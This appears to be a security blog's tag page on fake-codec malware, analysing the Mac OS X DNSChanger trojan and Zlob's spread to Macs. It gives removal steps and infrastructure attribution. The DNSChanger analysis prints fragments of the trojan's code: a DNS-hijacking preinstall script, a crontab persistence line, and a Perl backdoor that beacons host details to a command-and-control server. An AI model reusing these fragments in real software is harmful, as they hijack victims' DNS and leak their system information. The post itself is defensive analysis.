Posts Tagged ‘fake codec’

Porn Trojan Talks

Unusual Pop-up Ads

If you thought Trojan DNSChanger is dead, think twice ‘coz lately there has been series of reports from Mac OS X users experiencing unusual pop-up ads in their machines. Most of the infected users noticed that the unusual ads is coming from IP Address or as shown in the screen shot above.

This IP Address points to Intercage [AS27595] which is hosted by Atrivo in US, which apparently related to Russian Business Network(RBN). This domain host different names related to fake codec and rogue applications such as spysheriff, winspykiller, AntiVirGear and lot more. [Further Reading]

Unusual pop-up ads and internet browser results were amongst visible symptoms of this threat. Infected user should immediately change their DNS Settings and remove the following files in this folders:

~/Library/Internet Plug-Ins/plugins.settings
~/Library/Internet Plug-Ins/sendreq (usually the malware deletes this, but just double check)
~/Library/Internet Plug-Ins/QuickTime.xpt
~/Library/Internet Plug-Ins/Mozillaplug.plugin
Related Post:

Analysis of Trojan DNSChanger
Malware Retailer Includes Trojan for Mac
Fake YouTube Installs OS X Trojan DNSChange

Analysis of OSX Trojan DNS Changer

File Size

DMG : ~ 17.1 KB (17,598 bytes)
Installer.pkg : ~132 KB (135,168 bytes)

This malicious code does not spread and propagate by itself. It uses an ancient yet effective Social Engineering technique to entice users to manually install the program. This trojan disguises as video codec and associates itself to a shared and free download videos. It was first seen and linked to porn sites but later it was also linked to funny videos and seen as splogs (spam blog).

Is this in-the-wild ? Yes.

Installation & Behaviour
A user visits a rogue site and download a fake video codec. Check the screenshot here.

The disk image file will be automatically mounted but not extracted. This means, the user has to manually install the downloaded file.

The downloaded installer – Install.pkg, contains the following files:

Info.plist is the first file invoked during the installation. This file contains detailed usage information and behavior such as:

Brief description: Microsoft Company
Application Type: MacVideo
Release Version: 1.0
Authorization Action: RootAuthorization
Default Location: /Library/Internet Plug-Ins/
Installed Size: 60
Restart Action: NoRestart

Followed by, which contain information of files to install.

lsbom -s install.pkg/Contents/

It then access the files description.plist and PkgInfo, which gives the following information:

Version: 1.0
“Its a suppa puppa desc yo”
Title: MacCodec

PkgInfo: pmkrpkg1

Followed by BundleVersions.plist for version informations.

The installer comes with a “License Agreement”. Upon clicking “Continue”, a message box will display requiring the user to click “Agree” to continue the installation process.

Ok, let’s look further on the malicious codes.

Archive.pax.gz, postinstall, postupgrade, preinstall and preupgrade contains shell script that does the dirty works.

Postinstall and postupgrade contains exactly the same code, as well as preinstall and preupgrade.

Preinstall is invoked after the user agreed on the License Agreement. This trojan does not have damaging payloads, except it only modifies users’ DNS setting. Let’s check the code.

Code Analysis

Preinstall script:

path=”/Library/Internet Plug-Ins”
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e ‘s/.*PrimaryService : //’)<

Scutil, it retrieves user’s primary network interface.

get State:/Network/Global/IPv4

It then modifies DNS name server IP to
s1= and s2=

d.add ServerAddresses * $s1 $s2
set State:/Network/Service/$PSID/DNS

**Take note: IP addresses may change per variant.

It checks for a crontab file – plugins.settings, in this location “/Library/Internet Plug-Ins”. This file is a marker, it indicates whether this trojan has been previously installed or not.

exist=`crontab -l|grep plugins.settings`

If plugins.settings does not exist (meaning, it was not yet installed), the installation will proceed by dropping a temporary file \cron.inst

if [ “$exist” == “” ]; then
echo “* * * * * \”$path/plugins.settings\”>/dev/null 2>&1″ > cron.inst

Cron.inst has the following strings:

* * * * * “/Library/Internet Plug-Ins/QuickTime.xpt”>/dev/null 2>&1

It will execute cron.inst using Crontab command.

crontab cron.inst

Cron.inst executes another script, Quicktime.xpt. This is found in this location /Library/Internet Plug-Ins/

“/Library/Internet Plug-Ins/QuickTime.xpt”

In background, it will create a temporary file named, 1.

>/dev/null 2>&1

QuickTime.xpt redirects its output to this file instead of popping error or script command to the user’s screen.

Once cron.inst is executed, preinstall script will delete this temporary file.

rm -rf cron.inst

QuickTime.xpt script:

This script is inside Archive.pax.gz. The installation ends by executing cron.inst, which extracts its content to this location /Library/Internet Plug-Ins/.

Like preinstall script, QuickTime.xpt checks for users network information, attempt to modify DNS name server settings, checks the existence of QuickTime.xpt and if exist, it creates cron.inst, execute it and delete temporary file, 1.

Postinstall script:

path=”/Library/Internet Plug-Ins/”
/usr/bin/perl “$path/sendreq”
rm -rf “$path/sendreq”

It executes sendreq, which is a perl script and deletes it.

SendReq Script:

This perl base bot acts as a backdoor client component and communicates to a remote server through socket.

use IO::Socket;

It uses MIME base64 encoding to transmit messages through HTTP.

use integer;
my $eol = $_[1];
$eol = “\n” unless defined $eol;

my $res = pack(“u”, $_[0]);
# Remove first character of each line, remove newlines
$res =~ s/^.//mg;
$res =~ s/\n//g;

$res =~ tr|` -_|AA-Za-z0-9+/|; # `# help emacs
# fix padding at the end
my $padding = (3 – length($_[0]) % 3) % 3;
$res =~ s/.{$padding}$/’=’ x $padding/e if $padding;
# break encoded string into lines of no more than 76 characters each
if (length $eol) {
$res =~ s/(.{1,76})/$1$eol/g;
return $res;

The bot command-and-control server:

my $server=”″;

**Take note: IP addresses may change per variant.

Executes uname -p command to retrieve victim’s operating system processor type and hostname for the IP address.

my $server=”″; my $cmd=’uname
my $cmd=’uname -p;echo “;”;hostname’;$cmd=~s/\n//g;

Encode the gathered information, indicating “mac”.

my $uniqid=encode_base64(“mac;”.$cmd); $uniqid=~s/\n//g;

Send a request to remote server.

my $request=”GET / HTTP/1.1\r\nAccept-Language: $unigid\r\nHost: $server\r\n\r\n”;

This bot sends a request to the remote server, attempting to establish a connection through TCP port 80.

my $socket=IO::Socket::INET->new(PeerAddr=>$server,PeerPort=>80,Proto=>”tcp”,timeout=>10) or die();
print $socket $request;

Captured packet looks like this:

It sends victim’s information in base64 encoded strings:

GET / HTTP/1.1 Accept-Language: bWFjO2kzODY7cGMtdG9vbHNzLW1hY2Jvb2stcHJvLTE1LmxvY2Fsx Host:

Decoded version:

GET / HTTP/1.1 Accept-Language: mac;i386;xx-toolss-macbook-pro-15.local Host:

From this information, the C&C (command-and-control) server can determine the total count of infection, IP address and the geographical location of that infected host.

Furthermore, later versions of this trojan scripts are obfuscated making it little difficult for security analyst and researchers to read the code.


Trojan DNSChanger is as simple as changing DNS settings – no complication and no destructive behavior. These are simple scripts that are widely available online, built into mac installer and deployed to several existing fake codec domains.

The lesson here is that malwares or threats in Mac does not have to be complicated. With the vast information available online, it is possible that an ordinary person without programming background – also called script kiddie, can cause interruption and damage to our daily lives.

Mac OS X: 2007 Year Ender for Zlob

Zlob has been proliferating in Windows platform since 2005. It only started as simple trojan downloader and stealer which is capable to check and update itself.

Then, it was last year when this trojan stand-out to the crowd of other competing malwares. A new variant arrived to users via email employing social engineering tactics to attract users in clicking the link to video. However, the video does not play successfully without installing the required codec. This tricky behavior persuades the user to install the fake codec – unknowingly, the user has just installed the malware!

The spurs of shares, free downloads, blogs and social websites has become a perfect time for Zlob to infiltrate networks. Evidently, the increasing domain names and clicks have been utility for Zlob to stay visible in search engines.

Yes, all of this works in Windows until late this year (November), this trojan crosses over to Mac specifically OS X. Suddenly, a list of domain names is capable to download installers both for Windows and Mac users. Domain names hosting Zlob fake codec for Mac user does not sleep, it stays online 24×7 and it’s increasing in numbers. It’s out there in-the-wild!

create avatar

These sites are smart enough to check if you are running in Windows or Mac. Then, it gives you the right installer either in Windows Executable (EXE) or Disk Image (DMG) for Mac.

Who’s behind Zlob? Let’s investigate its network connection …

Web Site:


NET —-> []–> AS27595

Intercage [AS27595] is hosted by Atrivo in US, which apparently related to Russian Business Network(RBN). This domain host different names related to fake codec and rogue applications such as spysheriff, winspykiller, AntiVirGear and lot more.
In conclusion, the massive increase of sophisticated and organize cyber crimes boils to pursuit of profit and Mac users are no longer subject to proof-of-concept. The world’s known worst attackers are now introducing web base cross platform malware and this should increase awareness.